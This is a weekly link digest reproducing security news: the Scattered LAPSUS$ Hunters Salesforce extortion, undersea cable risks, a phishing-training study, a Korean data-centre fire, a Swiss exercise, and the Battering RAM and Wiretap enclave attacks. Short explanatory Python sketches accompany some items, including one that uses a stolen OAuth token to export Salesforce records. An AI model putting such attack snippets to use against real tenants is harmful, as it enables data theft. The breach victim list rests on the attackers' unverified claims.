
Shaarli Weekly

All of a week's links on a single page.

Week 40 (September 29, 2025)

Scattered LAPSUS$ Hunters Ransomware Group Claims New Victims on New Website
  • Daily Dark Web - dailydarkweb.net
    October 3, 2025

The newly formed cybercrime alliance, “Scattered LAPSUS$ Hunters,” has launched a new website detailing its claims of a massive data breach affecting Salesforce and its extensive customer base. This development is the latest move by the group, a notorious collaboration between members of the established threat actor crews ShinyHunters, Scattered Spider, and LAPSUS$. On their new site, the group is extorting Salesforce directly, threatening to leak nearly one billion records with a ransom deadline of October 10, 2025.

This situation stems from a widespread and coordinated campaign that targeted Salesforce customers throughout mid-2025. According to security researchers, the attacks did not exploit a vulnerability in Salesforce’s core platform. Instead, the threat actors, particularly those from the Scattered Spider group, employed sophisticated social engineering tactics.

The primary method involved voice phishing (vishing), where attackers impersonated corporate IT or help desk staff in phone calls to employees of target companies. These employees were then manipulated into authorizing malicious third-party applications within their company’s Salesforce environment. This action granted the attackers persistent access tokens (OAuth), allowing them to bypass multi-factor authentication and exfiltrate vast amounts of data. The alliance has now consolidated the data from these numerous breaches for this large-scale extortion attempt against Salesforce itself.
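
As an aside for defenders, a minimal sketch of why such a grant is so dangerous: once a rogue connected app holds an OAuth access token, API calls simply present it as a bearer credential, so no login page or MFA prompt is ever involved. The tenant URL, token, and query below are hypothetical placeholders; the REST query path follows Salesforce's documented pattern.

```python
# Hypothetical illustration: a bearer token issued to a malicious connected app
# is presented directly on API calls, so MFA is never re-prompted.
import requests

INSTANCE = "https://example.my.salesforce.com"   # hypothetical tenant URL
ACCESS_TOKEN = "00D...REDACTED"                  # token granted to the rogue app

def export_records(soql: str) -> dict:
    """Run a query with the stolen bearer token; no interactive login occurs."""
    resp = requests.get(
        f"{INSTANCE}/services/data/v58.0/query",
        headers={"Authorization": f"Bearer {ACCESS_TOKEN}"},
        params={"q": soql},
        timeout=30,
    )
    resp.raise_for_status()
    return resp.json()

if __name__ == "__main__":
    # A single authorized-app grant is enough to page through whole objects.
    print(export_records("SELECT Id, Name, Email FROM Contact LIMIT 10"))
```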

The website lists dozens of high-profile Salesforce customers allegedly compromised in the campaign. The list of alleged victims posted by the group includes:

Toyota Motor Corporation (🇯🇵): A multinational automotive manufacturer.
FedEx (🇺🇸): A global courier delivery services company.
Disney/Hulu (🇺🇸): A multinational mass media and entertainment conglomerate.
Republic Services (🇺🇸): An American waste disposal company.
UPS (🇺🇸): A multinational shipping, receiving, and supply chain management company.
Aeroméxico (🇲🇽): The flag carrier airline of Mexico.
Home Depot (🇺🇸): The largest home improvement retailer in the United States.
Marriott (🇺🇸): A multinational company that operates, franchises, and licenses lodging.
Vietnam Airlines (🇻🇳): The flag carrier of Vietnam.
Walgreens (🇺🇸): An American company that operates the second-largest pharmacy store chain in the United States.
Stellantis (🇳🇱): A multinational automotive manufacturing corporation.
McDonald’s (🇺🇸): A multinational fast food chain.
KFC (🇺🇸): A fast food restaurant chain that specializes in fried chicken.
ASICS (🇯🇵): A Japanese multinational corporation which produces sportswear.
GAP, INC. (🇺🇸): A worldwide clothing and accessories retailer.
HMH (hmhco.com) (🇺🇸): A publisher of textbooks, instructional technology materials, and assessments.
Fujifilm (🇯🇵): A multinational photography and imaging company.
Instructure.com – Canvas (🇺🇸): An educational technology company.
Albertsons (Jewel Osco, etc) (🇺🇸): An American grocery company.
Engie Resources (Plymouth) (🇺🇸): A retail electricity provider.
Kering (🇫🇷): A global luxury group that manages brands like Gucci, Balenciaga, and Brioni.
HBO Max (🇺🇸): A subscription video on-demand service.
Instacart (🇺🇸): A grocery delivery and pick-up service.
Petco (🇺🇸): An American pet retailer.
Puma (🇩🇪): A German multinational corporation that designs and manufactures athletic footwear and apparel.
Cartier (🇫🇷): A French luxury goods conglomerate.
Adidas (🇩🇪): A multinational corporation that designs and manufactures shoes, clothing, and accessories.
TripleA (aaa.com) (🇺🇸): A federation of motor clubs throughout North America.
Qantas Airways (🇦🇺): The flag carrier of Australia.
CarMax (🇺🇸): A used vehicle retailer.
Saks Fifth (🇺🇸): An American luxury department store chain.
1-800Accountant (🇺🇸): A nationwide accounting firm.
Air France & KLM (🇫🇷/🇳🇱): A major European airline partnership.
Google Adsense (🇺🇸): A program run by Google through which website publishers serve advertisements.
Cisco (🇺🇸): A multinational digital communications technology conglomerate.
Pandora.net (🇩🇰): A Danish jewelry manufacturer and retailer.
TransUnion (🇺🇸): An American consumer credit reporting agency.
Chanel (🇫🇷): A French luxury fashion house.
IKEA (🇸🇪): A Swedish-founded multinational group that designs and sells ready-to-assemble furniture.

According to the actor, the breach involves nearly 1 billion records from Salesforce and its clients. The allegedly compromised data includes:

Sensitive Personally Identifiable Information (PII)
Strategic business records that could impact market position
Data from over 100 other demand instances hosted on Salesforce infrastructure

Submarine cable security is all at sea

• The Register
Mon 29 Sep 2025 // 08:01 UTC
by Danny Bradbury

Feature: Guess how much of our direct transatlantic data capacity runs through two cables in Bude?

The first transatlantic cable, laid in 1858, delivered a little over 700 messages before promptly dying a few weeks later. 167 years on, the undersea cables connecting the UK to the outside world process £220 billion in daily financial transactions. Now, the UK Parliament's Joint Committee on National Security Strategy (JCNSS) has told the government that it has to do a better job of protecting them.

The Committee's report, released on September 19, calls the government "too timid" in its approach to protecting the cables that snake from the UK to various destinations around the world. It warns that "security vulnerabilities abound" in the UK's undersea cable infrastructure, when even a simple anchor-drag can cause major damage.

There are 64 cables connecting the UK to the outside world, according to the report, carrying most of the country's internet traffic. Satellites can't shoulder the data volumes involved, are too expensive, and only account for around 5 percent of traffic globally.

These cables are invaluable to the UK economy, but they're also difficult to protect. They are heavily shielded in the shallow waters close to where they come ashore. That's because accidental damage from fishing operations and other vessels is common. On average, around 200 cables suffer faults each year. But as they get further out, the shielding is less robust. Instead, the companies that lay the cables rely on the depth of the sea to do the job (you'll be pleased to hear that sharks don't generally munch on them).

The report acknowledges that the UK's cable infrastructure is strong and that, in some areas at least, there is enough redundancy to handle disruptions. For example, it notes that 75 percent of UK transatlantic traffic routes through two cables that come ashore in Bude, Cornwall. That seems like quite the vulnerability, but the report says there is plenty of infrastructure to route around if anything happened to them. There is "no imminent threat to the UK's national connectivity," it soothes.

But it simultaneously cautions against adopting what it describes as "business-as-usual" views in the industry. The government "focuses too much on having 'lots of cables' and pays insufficient attention to the system's actual ability to absorb unexpected shocks," it frets. It warns that "the impacts on connectivity would be much more serious," if onward connections to Europe suffered as part of a coordinated attack.

"While our national connectivity does not face immediate danger, we must prepare for the possibility that our cables can be threatened in the event of a security crisis," it says.

Reds on the sea bed
Who is most likely to mount such an attack, if anyone? Russia seems front and center, according to experts. It has reportedly been studying the topic for years. Keir Giles, director at The Centre for International Cyber Conflict and senior consulting fellow of the Russia and Eurasia Programme at Chatham House, argues that Russia has a long history of information warfare that stepped up after it annexed Crimea in 2014.

"The thinking part of the Russian military suddenly decided 'actually, this information isolation is the way to go, because it appears to win wars for us without having to fight them'," Giles says, adding that this approach is often combined with choke holds on land-based information sources. Cutting off the population in the target area from any source of information other than what the Russian troops feed them achieves results at low cost.

In a 2021 paper he co-wrote for the NATO Cooperative Cyber Defence Centre of Excellence, he pointed to the Glavnoye upravleniye glubokovodnykh issledovaniy (Main Directorate for Deep-Water Research, or GUGI), a secretive Russian agency responsible for analyzing undersea cables for intelligence or disruption. According to the JCNSS report, this organization operates the Losharik, a titanium-hulled submarine capable of targeting cables at extreme depth.

Shenanigans under the sea
You don't need a fancy submarine to snag a cable, as long as you're prepared to do it in plain sight closer to the coast. The JCNSS report points to several incidents around the UK and the Baltics. November last year saw two incidents. In the first, Chinese-flagged cargo vessel Yi Peng 3 dragged its anchor for 300km and cut two cables between Sweden and Lithuania. That same month, the UK and Irish navies shadowed Yantar, a Russian research ship loitering around UK cable infrastructure in the Irish Sea.

The following month saw Cook Islands-flagged ship Eagle S damage one power cable and three data cables linking Finland and Estonia. This May, unaffiliated vessel Jaguar approached an undersea cable off Estonia and was escorted out of the country's waters.

The real problem with brute-force physical damage from vessels is that it's difficult to prove that it's intentional. On one hand, it's perfect for an aggressor's plausible deniability, and could also be a way to test the boundaries of what NATO is willing to tolerate. On the other, it could really be nothing.

"Attribution of sabotage to critical undersea infrastructure is difficult to prove, a situation significantly complicated by the prevalence of under-regulated and illegal shipping activities, sometimes referred to as the shadow fleet," a spokesperson for NATO told us.

"I'd push back on an assertion of a coordinated campaign," says Alan Mauldin, research director at analyst company TeleGeography, which examines undersea cable infrastructure warns. He questions assumptions that the Baltic cable damage was anything other than a SNAFU.

The Washington Post also reported comment from officials on both sides of the Atlantic that the Baltic anchor-dragging was probably accidental. Giles scoffs at that. "Somebody had been working very hard to persuade countries across Europe that this sudden spate of cables being broken in the Baltic Sea, one after another, was all an accident, and they were trying to say that it's possible for ships to drag their anchors without noticing," he says.

One would hope that international governance frameworks could help. The UN Convention on the Law of the Sea [PDF] has a provision against messing with undersea cables, but many states haven't enacted the agreement. In any case, plausible deniability makes things more difficult.

"The main challenge in making meaningful governance reforms to secure submarine cables is figuring out what these could be. Making fishing or anchoring accidents illegal would be disproportionate," says Anniki Mikelsaar, doctoral researcher at Oxford University's Oxford Internet Institute. "As there might be some regulatory friction, regional frameworks could be a meaningful avenue to increase submarine cable security."

The difficulty in pinning down intent hasn't stopped NATO from stepping in. In January it launched Baltic Sentry, an initiative to protect undersea infrastructure in the region. That effort includes frigates, patrol aircraft, and naval drones to keep an eye on what happens both above and below the waves.

Preparing for the worst
Regardless of whether vessels are doing this deliberately or by accident, we have to be prepared for it, especially as cable installation shows no sign of slowing. Increasing bandwidth needs will boost global cable kilometers by 48 percent between now and 2040, says TeleGeography, which adds that annual repairs will rise 36 percent over the same period.

"Many cable maintenance ships are reaching the end of their design life cycle, so more investment into upgrading the fleets is needed. This is important to make repairs faster," says Mikelsaar.

There are 62 vessels capable of cable maintenance today, and TeleGeography predicts that'll be enough for the next 15 years. However, it takes time to build these vessels and train the operators, meaning that we'll need to start delivering new vessels soon.

The problem for the UK is that it doesn't own any of that repair capacity, says the JCNSS. It can take a long time to travel to a cable and repair it, and ships can only work on one at a time. The Committee advises that the UK acquire sovereign repair capacity of its own, prescribing a repair ship by 2030.

"This could be leased to industry on favorable terms during peacetime and made available for Government use in a crisis," it says, adding that the Navy should establish a set of reservists that will be trained and ready to operate the vessel.

Sir Chris Bryant MP, the Minister for Data Protection and Telecoms, told the Committee that it was being apocalyptic and "over-egging the pudding" by examining the possibility of a co-ordinated attack. "We disagree," the Committee said in the report, arguing that the security situation in the next decade is uncertain.

"Focusing on fishing accidents and low-level sabotage is no longer good enough," the report adds. "The UK faces a strategic vulnerability in the event of hostilities. Publicly signaling tougher defensive preparations is vital, and may reduce the likelihood of adversaries mounting a sabotage effort in the first place."

To that end, it has made a battery of recommendations. These include building the risk of a coordinated campaign against undersea infrastructure into its risk scenarios, and protecting the stations - often in remote coastal locations - where the cables come onto land.

The report also recommends that the Department for Science, Innovation and Technology (DSIT) ensures all lead departments have detailed sector-by-sector technical impact studies addressing widespread cable outages.

"Government works around the clock to ensure our subsea cable infrastructure is resilient and can withstand hostile and non-hostile threats," DSIT told El Reg, adding that when breaks happen, the UK has some of the fastest cable repair times in the world, and there's usually no noticeable disruption."

"Working with NATO and Joint Expeditionary Force allies, we're also ensuring hostile actors cannot operate undetected near UK or NATO waters," it added. "We're deploying new technologies, coordinating patrols, and leading initiatives like Nordic Warden alongside NATO's Baltic Sentry mission to track and counter undersea threats."

Nevertheless, some seem worried. Vili Lehdonvirta, head of the Digital Economic Security Lab (DIESL) and professor of Technology Policy at Aalto University, has noticed increased interest from governments and private sector organizations alike in how much their daily operations depend on overseas connectivity. He says that this likely plays into increased calls for digital sovereignty.

"The rapid increase in data localization laws around the world is partly explained by this desire for increased resilience," he says. "But situating data and workloads physically close as opposed to where it is economically efficient to run them (eg. because of cheaper electricity) comes with an economic cost."

So the good news is that we know exactly how vulnerable our undersea cables are. The bad news is that so does everyone else with a dodgy cargo ship and a good poker face. Sleep tight.

Cybersecurity Training Programs Don’t Prevent Employees from Falling for Phishing Scams

today.ucsd.edu UC San Diego
September 17, 2025
Story by:
Ioana Patringenaru - ipatrin@ucsd.edu

Study involving 19,500 UC San Diego Health employees evaluated the effectiveness of two different types of cybersecurity training

Cybersecurity training programs as implemented today by most large companies do little to reduce the risk that employees will fall for phishing scams–the practice of sending malicious emails posing as legitimate to get victims to share personal information, such as their social security numbers.

That’s the conclusion of a study evaluating the effectiveness of two different types of cybersecurity training during an eight-month, randomized controlled experiment. The experiment involved 10 different phishing email campaigns developed by the research team and sent to more than 19,500 employees at UC San Diego Health.

The team presented their research at the Black Hat conference, held Aug. 2 to 7 in Las Vegas. The team originally shared their work at the 46th IEEE Symposium on Security and Privacy in May in San Francisco.

Researchers found that there was no significant relationship between whether users had recently completed an annual, mandated cybersecurity training and the likelihood of falling for phishing emails. The team also examined the efficacy of embedded phishing training – the practice of sharing anti-phishing information after a user engages with a phishing email sent by their organization as a test. For this type of training, researchers found that the difference in failure rates between employees who had completed the training and those who did not was extremely low.

“Taken together, our results suggest that anti-phishing training programs, in their current and commonly deployed forms, are unlikely to offer significant practical value in reducing phishing risks,” the researchers write.

Why is it important to combat phishing?

Whether phishing training is effective is an important question. In spite of 20 years of research and development into malicious email filtering techniques, a 2023 IBM study identifies phishing as the single largest source of successful cybersecurity breaches–16% overall, researchers write.

This threat is particularly challenging in the healthcare sector, where targeted data breaches have reached record highs. In 2023 alone, the U.S. Department of Health and Human Services (HHS) reported over 725 large data breach events, covering over 133 million health records, and 460 associated ransomware incidents.

As a result, it has become standard in many sectors to mandate both annual formal security training and unscheduled phishing exercises, in which employees are sent simulated phishing emails and then provided “embedded” training if they mistakenly click on the email’s links.

Researchers were trying to understand which of these types of training are most effective. It turns out, as currently administered, that none of them are.

Why are cybersecurity trainings not effective?
One reason the trainings are not effective is that the majority of people do not engage with the embedded training materials, said Grant Ho, study co-author and a faculty member at the University of Chicago, who did some of this work as a postdoctoral researcher at UC San Diego. Overall, 75% of users engaged with the embedded training materials for a minute or less. One-third immediately closed the embedded training page without engaging with the material at all.

“This does lend some suggestion that these trainings, in their current form, are not effective,” said Ariana Mirian, another paper co-author, who did the work as a Ph.D. student in the research group of UC San Diego computer science professors Stefan Savage and Geoff Voelker.

A study of 19,500 employees over eight months
To date, this is the largest study of the effectiveness of anti-phishing training, covering 19,500 employees at UC San Diego Health. In addition, it’s one of only two studies that used a randomized controlled trial method to determine whether employees would receive training, and what kind of phishing emails–or lures–they would receive.

After sending 10 different types of phishing emails over the course of eight months, the researchers found that embedded phishing training only reduced the likelihood of clicking on a phishing link by 2%. This is particularly striking given the expense in time and effort that these trainings require, the researchers note.

Researchers also found that more employees fell for the phishing emails as time went on. In the first month of the study, only 10% of employees clicked on a phishing link. By the eighth month, more than half had clicked on at least one phishing link.

In addition, researchers found that some phishing emails were considerably more effective than others. For example, only 1.82% of recipients clicked on a phishing link to update their Outlook password. But 30.8% clicked on a link that purported to be an update to UC San Diego Health’s vacation policy.

Given the results of the study, researchers recommend that organizations refocus their efforts to combat phishing on technical countermeasures. Specifically, two measures would have better return on investment: two-factor authentication for hardware and applications, as well as password managers that only work on correct domains, the researchers write.
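
To illustrate the second countermeasure, here is a hedged sketch (not any particular product's logic) of the exact-origin check a domain-bound password manager performs: the credential is released only when the page's origin matches the one recorded at enrollment, so a lookalike phishing domain gets nothing.

```python
# Hedged sketch of exact-origin credential binding; VAULT and the URLs are
# hypothetical. Real managers and WebAuthn perform the equivalent check for you.
from urllib.parse import urlsplit

VAULT = {"https://sso.example-health.org": "s3cr3t"}   # origin recorded at enrollment

def origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.hostname}"

def autofill(url: str) -> str | None:
    # Exact origin comparison only: no substring or "looks similar" matching.
    return VAULT.get(origin_of(url))

print(autofill("https://sso.example-health.org/login"))      # 's3cr3t'
print(autofill("https://sso.example-health.org.evil.test"))  # None: lookalike gets nothing
```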

This work was supported in part by funding from the University of California Office of the President “Be Smart About Safety” program–an effort focused on identifying best practices for reducing the frequency and severity of systemwide insurance losses. It was also supported in part by U.S. National Science Foundation grant CNS-2152644, the UCSD CSE Postdoctoral Fellows program, the Irwin Mark and Joan Klein Jacobs Chair in Information and Computer Science, the CSE Professorship in Internet Privacy and/or Internet Data Security, a generous gift from Google, and operational support from the UCSD Center for Networked Systems.

NIRS fire destroys government's cloud storage system, no backups available

Korea JoongAng Daily
Wednesday
October 1, 2025
BY JEONG JAE-HONG [yoon.soyeon@joongang.co.kr]

A fire at the National Information Resources Service (NIRS)'s Daejeon headquarters destroyed the government’s G-Drive cloud storage system, erasing work files saved individually by some 750,000 civil servants, the Ministry of the Interior and Safety said Wednesday.

The fire broke out in the server room on the fifth floor of the center, damaging 96 information systems designated as critical to central government operations, including the G-Drive platform. The G-Drive has been in use since 2018, requiring government officials to store all work documents in the cloud instead of on personal computers. It provided around 30 gigabytes of storage per person.

However, due to the system’s large-capacity, low-performance storage structure, no external backups were maintained — meaning all data has been permanently lost.

The scale of damage varies by agency. The Ministry of Personnel Management, which had mandated that all documents be stored exclusively on G-Drive, was hit hardest. The Office for Government Policy Coordination, which used the platform less extensively, suffered comparatively less damage.

The Personnel Ministry stated that all departments are expected to experience work disruptions. It is currently working to recover alternative data using any files saved locally on personal computers within the past month, along with emails, official documents and printed records.

The Interior Ministry noted that official documents created through formal reporting or approval processes were also stored in the government’s Onnara system and may be recoverable once that system is restored.

“Final reports and official records submitted to the government are also stored in OnNara, so this is not a total loss,” said a director of public services at the Interior Ministry.

The Interior Ministry explained that while most systems at the Daejeon data center are backed up daily to separate equipment within the same center and to a physically remote backup facility, the G-Drive’s structure did not allow for external backups. This vulnerability ultimately left it unprotected.

Criticism continues to build regarding the government's data management protocols.

The Swiss Confederation tests its capabilities against external threats

blick.ch
Fabian Eberhard
Published: 28.09.2025 at 09:57

Cyberattacks, disinformation, Russian-European tensions: Switzerland is preparing. On November 6 and 7, the national exercise EI 25 will test the country's response to hybrid threats. On the program: simulated cyberattacks, terrorist attacks and epidemics.

Cyberattacks, drone overflights, disinformation campaigns: is Vladimir Putin testing the limits of NATO?

For now, nothing indicates that Moscow is planning any military incursion within our borders. What is certain, however, is that in a few weeks a national security exercise will be launched in Switzerland, simulating a similar scenario.

A scenario kept secret
The Integrated Exercise 2025 (EI 25), which will take place on November 6 and 7, is intended to test the strategic crisis organization of the Confederation, the cantons and other actors, such as operators of critical infrastructure: hospitals, airports, energy suppliers.

The scenario remains secret until the very end. The Confederation confirms only that a "hybrid threat against Switzerland" is to be exercised. "No reference is made to any real country or real events," explains Urs Bruderer, spokesperson for the Federal Chancellery. Insiders nonetheless assume that the exercise setup will resemble an escalation of the conflict between Russia and Europe, with massive consequences.

Well-known names are taking part
The scenario was developed by an advisory board composed of various experts, including Markus Mäder, the Confederation's State Secretary for Security Policy, Peter Maurer, former president of the International Committee of the Red Cross (ICRC), and Doris Leuthard, former Federal Councillor from The Centre party.

For the latter, it is a brief return to the Confederation after leaving the government at the end of 2018. "The members of the advisory board are expected to bring together their knowledge and experience at the politico-strategic level in the various thematic areas relevant to the exercise," explains Urs Bruderer.

On that note, Doris Leuthard headed the Federal Department of the Environment, Transport, Energy and Communications (DETEC) during her term in office and therefore has a degree of expertise in critical infrastructure.

An exercise with an international dimension
For EI 25, two major exercises have been merged: the Integrated Security Exercise and the Strategic Leadership Exercise, which in the past have simulated cyberattacks, terrorist attacks and epidemics. Based on lessons learned from the Covid-19 pandemic, the Federal Council decided to replace the two exercises with a combined one allowing the Confederation and the cantons to test their cooperation in a crisis situation.

According to the Confederation, the exercise "will involve a large number of actors across Switzerland". Urs Bruderer also notes that "the international dimension is an important aspect of the exercise". International actors will not take part in person, however, but will be simulated by Swiss participants.

Intel and AMD trusted enclaves, a foundation for network security, fall to physical attacks

Ars Technica, Dan Goodin – Sep 30, 2025, 22:25

The chipmakers say physical attacks aren’t in the threat model. Many users didn’t get the memo.

In the age of cloud computing, protections baked into chips from Intel, AMD, and others are essential for ensuring confidential data and sensitive operations can’t be viewed or manipulated by attackers who manage to compromise servers running inside a data center. In many cases, these protections—which work by storing certain data and processes inside encrypted enclaves known as TEEs (trusted execution environments)—are essential for safeguarding secrets stored in the cloud by the likes of Signal Messenger and WhatsApp. All major cloud providers recommend that customers use them. Intel calls its protection SGX, and AMD has named it SEV-SNP.

Over the years, researchers have repeatedly broken the security and privacy promises that Intel and AMD have made about their respective protections. On Tuesday, researchers independently published two papers laying out separate attacks that further demonstrate the limitations of SGX and SEV-SNP. One attack, dubbed Battering RAM, defeats both protections and allows attackers to not only view encrypted data but also to actively manipulate it to introduce software backdoors or to corrupt data. A separate attack known as Wiretap is able to passively decrypt sensitive data protected by SGX and remain invisible at all times.

Attacking deterministic encryption
Both attacks use a small piece of hardware, known as an interposer, that sits between CPU silicon and the memory module. Its position allows the interposer to observe data as it passes from one to the other. They exploit both Intel’s and AMD’s use of deterministic encryption, which produces the same ciphertext each time the same plaintext is encrypted with a given key. In SGX and SEV-SNP, that means the same plaintext written to the same memory address always produces the same ciphertext.

Deterministic encryption is well-suited for certain uses, such as full disk encryption, where the data being protected never changes once the thing being protected (in this case, the drive) falls into an attacker’s hands. The same encryption is suboptimal for protecting data flowing between a CPU and a memory chip because adversaries can observe the ciphertext each time the plaintext changes, opening the system to replay attacks and other well-known exploit techniques. Probabilistic encryption, by contrast, resists such attacks because the same plaintext can encrypt to a wide range of ciphertexts that are randomly chosen during the encryption process.
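
To make the trade-off concrete, the toy Python comparison below (using the cryptography package; it is not Intel's or AMD's actual memory-encryption scheme) shows how a deterministic mode repeats ciphertext for repeated plaintext, while a nonce-based probabilistic mode does not.

```python
# Toy illustration of deterministic vs. probabilistic encryption.
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = os.urandom(16)
block = b"SECRET BLOCK 16B"          # 16-byte plaintext written twice to memory

def ecb_encrypt(data: bytes) -> bytes:
    enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    return enc.update(data) + enc.finalize()

# Deterministic: identical plaintext -> identical ciphertext, so an observer on
# the memory bus can spot repeats and replay old values.
print(ecb_encrypt(block) == ecb_encrypt(block))            # True

# Probabilistic: a fresh random nonce makes every ciphertext differ.
aead = AESGCM(key)
ct1 = aead.encrypt(os.urandom(12), block, None)
ct2 = aead.encrypt(os.urandom(12), block, None)
print(ct1 == ct2)                                          # False
```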

“Fundamentally, [the use of deterministic encryption] is a design trade-off,” Jesse De Meulemeester, lead author of the Battering RAM paper, wrote in an online interview. “Intel and AMD opted for deterministic encryption without integrity or freshness to keep encryption scalable (i.e., protect the entire memory range) and reduce overhead. That choice enables low-cost physical attacks like ours. The only way to fix this likely requires hardware changes, e.g., by providing freshness and integrity in the memory encryption.”

Daniel Genkin, one of the researchers behind Wiretap, agreed. “It’s a design choice made by Intel when SGX moved from client machines to server,” he said. “It offers better performance at the expense of security.” Genkin was referring to Intel’s move about five years ago to discontinue SGX for client processors—where encryption was limited to no more than 256 MB of RAM—to server processors that could encrypt terabytes of RAM. The transition required Intel to revamp the encryption to make it scale for such vast amounts of data.

“The papers are two sides of the same coin,” he added.

While both of Tuesday’s attacks exploit weaknesses related to deterministic encryption, their approaches and findings are distinct, and each comes with its own advantages and disadvantages. Both research teams said they learned of the other’s work only after privately submitting their findings to the chipmakers. The teams then synchronized the publish date for Tuesday. It’s not the first time such a coincidence has occurred. In 2018, multiple research teams independently developed attacks with names including Spectre and Meltdown. Both plucked secrets out of Intel and AMD processors by exploiting their use of a performance enhancement known as speculative execution.

AMD declined to comment on the record, and Intel didn’t respond to questions sent by email. In the past, both chipmakers have said that their respective TEEs are designed to protect against compromises of a piece of software or the operating system itself, including in the kernel. The guarantees, the companies have said, don’t extend to physical attacks such as Battering RAM and Wiretap, which rely on physical interposers that sit between the processor and the memory chips. Despite this limitation, many cloud-based services continue to trust assurances from the TEEs even when they have been compromised through physical attacks (more about that later).

Intel and AMD each published advisories on Tuesday.

Battering RAM
Battering RAM uses a custom-built analog switch to act as an interposer that reads encrypted data as it passes between protected memory regions in DDR4 memory chips and an Intel or AMD processor. By design, both SGX and SEV-SNP make this ciphertext inaccessible to an adversary. To bypass that protection, the interposer creates memory aliases in which two different memory addresses point to the same location in the memory module.

The Battering-RAM interposer, containing two analog switches (bottom center), is controlled by a microcontroller (left). The switches can dynamically either pass through the command signals to the connected DIMM or connect the respective lines to ground. Credit: De Meulemeester et al.

“This lets the attacker capture a victim's ciphertext and later replay it from an alias,” De Meulemeester explained. “Because Intel's and AMD's memory encryption is deterministic, the replayed ciphertext always decrypts into valid plaintext when the victim reads it.” The PhD researcher at KU Leuven in Belgium continued:

When the CPU writes data to memory, the memory controller encrypts it deterministically, using the plaintext and the address as inputs. The same plaintext written to the same address always produces the same ciphertext. Through the alias, the attacker can't read the victim's secrets directly, but they can capture the victim's ciphertext. Later, by replaying this ciphertext at the same physical location, the victim will decrypt it to a valid, but stale, plaintext.

This replay capability is the primitive on which both our SGX and SEV attacks are built.

In both cases, the adversary installs the interposer, either through a supply-chain attack or physical compromise, and then runs either a virtual machine or application at a chosen memory location. At the same time, the adversary also uses the aliasing to capture the ciphertext. Later, the adversary replays the captured ciphertext, which, because it sits in a region the attacker has access to, is then decrypted back into plaintext.
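
The following toy model sketches that replay primitive under the simplifying assumption that ciphertext depends only on the key, the memory address, and the plaintext; it is not the real memory-controller construction, just an illustration of why a captured ciphertext decrypts to valid but stale data when written back to the same address.

```python
# Toy model of the replay primitive: deterministic, address-tweaked encryption.
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

KEY = os.urandom(16)

def _tweak(addr: int) -> bytes:
    # Derive a 16-byte per-address tweak by encrypting the address itself.
    enc = Cipher(algorithms.AES(KEY), modes.ECB()).encryptor()
    return enc.update(addr.to_bytes(16, "big")) + enc.finalize()

def mem_encrypt(addr: int, pt: bytes) -> bytes:
    enc = Cipher(algorithms.AES(KEY), modes.ECB()).encryptor()
    xored = bytes(a ^ b for a, b in zip(pt.ljust(16), _tweak(addr)))
    return enc.update(xored) + enc.finalize()

def mem_decrypt(addr: int, ct: bytes) -> bytes:
    dec = Cipher(algorithms.AES(KEY), modes.ECB()).decryptor()
    xored = dec.update(ct) + dec.finalize()
    return bytes(a ^ b for a, b in zip(xored, _tweak(addr)))

ram = {0x1000: mem_encrypt(0x1000, b"balance=100")}
stale = ram[0x1000]                                # interposer captures ciphertext
ram[0x1000] = mem_encrypt(0x1000, b"balance=1")    # victim later overwrites the value
ram[0x1000] = stale                                # attacker replays the old ciphertext
print(mem_decrypt(0x1000, ram[0x1000]).rstrip())   # b'balance=100': valid but stale
```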

Because SGX uses a single memory-encryption key for the entire protected range of RAM, Battering RAM can gain the ability to write or read plaintext into these regions. This allows the adversary to extract the processor’s provisioning key and, in the process, break the attestation SGX is supposed to provide to certify its integrity and authenticity to remote parties that connect to it.

AMD processors protected by SEV use a single encryption key to produce all ciphertext on a given virtual machine. This prevents the ciphertext replaying technique used to defeat SGX. Instead, Battering RAM captures and replays the cryptographic elements that are supposed to prove the virtual machine hasn’t been tampered with. By replaying an old attestation report, Battering RAM can load a backdoored virtual machine that still carries the SEV-SNP certification that the VM hasn’t been tampered with.

The key benefit of Battering RAM is that it requires equipment that costs less than $50 to pull off. It also allows active decryption, meaning encrypted data can be both read and tampered with. In addition, it works against both SGX and SEV-SNP, as long as they work with DDR4 memory modules.

Wiretap
Wiretap, meanwhile, is limited to breaking only SGX working with DDR4, although the researchers say it would likely work against the AMD protections with a modest amount of additional work. Wiretap, however, allows only for passive decryption, which means protected data can be read, but data can’t be written to protected regions of memory. The interposer and the equipment for analyzing the captured data also cost considerably more than Battering RAM’s, at about $500 to $1,000.

Like Battering RAM, Wiretap exploits deterministic encryption, except the latter attack maps ciphertext to a list of known plaintext words that the ciphertext is derived from. Eventually, the attack can recover enough ciphertext to reconstruct the attestation key.

Genkin explained:

Let’s say you have an encrypted list of words that will be later used to form sentences. You know the list in advance, and you get an encrypted list in the same order (hence you know the mapping between each word and its corresponding encryption). Then, when you encounter an encrypted sentence, you just take the encryption of each word and match it against your list. By going word by word, you can decrypt the entire sentence. In fact, as long as most of the words are in your list, you can probably decrypt the entire conversation eventually. In our case, we build a dictionary between common values occurring within the ECDSA algorithm and their corresponding encryption, and then use this dictionary to recover these values as they appear, allowing us to extract the key.
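
A hedged sketch of that dictionary idea follows; it is a simplified model rather than the Wiretap implementation, and the det_encrypt helper merely stands in for "the ciphertext observed on the memory bus when a known plaintext is written."

```python
# Simplified model of a ciphertext-dictionary attack against deterministic encryption.
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(16)   # never known to the attacker; only ciphertexts leak on the bus

def det_encrypt(word: bytes) -> bytes:
    # Stand-in for "the ciphertext seen on the bus for a known plaintext".
    enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    return enc.update(word.ljust(16)) + enc.finalize()

# The attacker knows the vocabulary of values that can appear (e.g. common
# intermediate values of a signing algorithm) and records each one's ciphertext.
vocabulary = [b"nonce", b"scalar", b"digest", b"sig_r", b"sig_s"]
dictionary = {det_encrypt(w): w for w in vocabulary}

# Later, freshly observed ciphertext blocks are decoded purely by lookup.
observed = [det_encrypt(b"digest"), det_encrypt(b"sig_r")]
print([dictionary.get(ct, b"?") for ct in observed])   # [b'digest', b'sig_r']
```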

